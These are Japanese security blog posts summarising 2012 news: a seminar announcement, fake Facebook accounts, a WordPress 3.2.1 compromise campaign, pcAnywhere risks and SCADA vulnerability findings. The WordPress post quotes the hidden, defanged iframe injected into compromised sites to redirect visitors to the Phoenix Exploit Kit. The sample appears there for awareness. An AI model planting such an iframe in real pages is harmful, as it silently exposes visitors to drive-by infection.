2月28日 SCSK サイバー攻撃の動向と対策セミナーで講演します

security, 私 |

2月28日(火)にSCSK主催、IBM共催の『緊急開催！サイバー攻撃の動向と対策セミナー〜セキュリティスペシャリストから学ぶ最新セキュリティ事情〜』にて基調講演を『最新のサイバー攻撃動向』というテーマで務めさせて頂きます。

内容は、標的型攻撃、Webへの攻撃、制御システムへの攻撃などの動向を一部デモなどを交えてご紹介する予定です。

まだアジェンダを作ってる最中ですが、標的型攻撃はExploitを仕込んだPDFなどを作成してバックドアを作るデモをやってみたり、Webへの攻撃はID・パスワード使い回しによる問題を探ってみたり、制御システムはそのシステムやプラットフォームのセキュリティの現状などをお届けしようかと思っています。（変更の予定はありですが…）

日時：2012年2月28日(火) 14:30-17:20 （14:00開場）
会場：IBMイノベーションセンター 渋谷
定員：60名
参加費：無料

是非ご参加下さい！

• 緊急開催！サイバー攻撃の動向と対策セミナー〜セキュリティスペシャリストから学ぶ最新セキュリティ事情〜｜SCSK株式会社

ツイートする

Facebookの攻撃者アカウントの特徴とは

security |

Facebookはよく詐欺やスパムのターゲットになっていて、そのために偽アカウントが作られることもあります。そんな攻撃者などが作成した偽アカウントの特徴を、Barracuda Labsが2884のアクティブユーザーから分析しています。

• 偽アカウントの60％はバイセクシャルと主張。これは実ユーザーの10倍以上
• 偽アカウントは実ユーザーの6倍の友人がいる。ユーザー数は 726：130
• 偽アカウントは実ユーザーの100倍以上写真タグ付けを使用。136タグ/4写真：1タグ/4写真
• 偽アカウントのほとんど（97％）は女性。実ユーザーは40％程度

だそうです。周りに該当する人はいませんか？

まァ、実ユーザーである可能性も否めませんが。

• Attackers use fake friends to blend into Facebook

ツイートする

Wordpress3.2.1の脆弱性を狙ったマルウェア

security |

Wordpress3.2.1の脆弱性を狙ったマルウェアが拡がっているそうで、ここ数日で数百のサイトが攻撃で感染しているとのこと。

攻撃が成功した場合、UploadsフォルダにHTMLページがアップロードされ、マルウェアの感染を自動化するPhoenix Exploit Kitのページにユーザーをリダイレクトするようです。このページには難読化された以下のようなIFRAMEが埋め込まれています。

<iframe style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px" src="hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php" frameborder="0"> </ IFRAME >

• Massive Compromise of WordPress-based Sites but ‘Everything will be Fine’ « M86 Security Labs Blog

対策はWordpressの最新版へのアップデートでしょうか。

ツイートする

シマンテック社：今すぐ「pcAnywhere」の使用停止を

security |

Symantec社から各種製品の2006年のソースコードが奪われた事件に起因した、セキュリティの警告が出ています。

その中でも「pcAnywhere」というリモートアクセスのソフトウェアは、中間者攻撃を受けたり、盗聴されるなどの可能性があり、危険なため使用を停止した方がよいとのことです。

ウイルス対策製品のNortonシリーズのソースコードも漏えいしているようですが、こちらは問題ないとのこと。本当かな？

シマンテック社のホワイトペーパーはこちら

• http://www.symantec.com/connect/sites/default/files/pcAnywhere%20Security%20Recommendations%20WP_01_23_Final.pdf

「pcanywhere express java client」でググると動いているサイトがいっぱい見つかりますが、大丈夫でしょうかね…。

• Symantec: Stop using pcAnywhere, right now | Naked Security

しかも、ソースコード漏えいとは関係なく重大なセキュリティホールが見つかったみたいですね。上記の危険性をわかった上で使い続ける方も、パッチは適用しましょう。

• pcAnywhere let anyone anywhere inject code into PCs • The Register

ツイートする

SCADAシステム5社7製品のセキュリティ調査結果は芳しくない

security |

Stuxnet以来、SCADAシステムのセキュリティが注目されていますが、Reid Wightman氏を始めとしたベースキャンプチームが6社のSCADAシステムのセキュリティ調査を行いました。

調査対象となたシステムは5社7製品で下記のとおり。

• Control Microsystems SCADAPack (bricked early on)
• General Electric D20ME
• Koyo / Direct LOGIC H4-ES
• Rockwell Automation / Allen-Bradley ControlLogix
• Rockwell Automation / Allen-Bradley MicroLogix
• Schneider Electric Modicon Quantum
• Schweitzer SEL-2032

調査結果は以下のようになっています。

ほとんどのシステムで重大な問題が見つかっているようですね。

調査には診断ツールとしてはメジャーなNessusやMetasploitが使われていて、調査に使ったフィードも最新版には反映されているとのこと。SCADAシステムを運用している方は是非Nessusを使って診断をしてみてはいかがでしょうか。

• Digital Bond and Tenable Network Security Collaborate on Continuous Critical Infrastructure Protection | Tenable Network Security
• New Metasploit Module to Exploit GE PLC SCADA Devices

• Project Basecamp at S4 | Digital Bond

ツイートする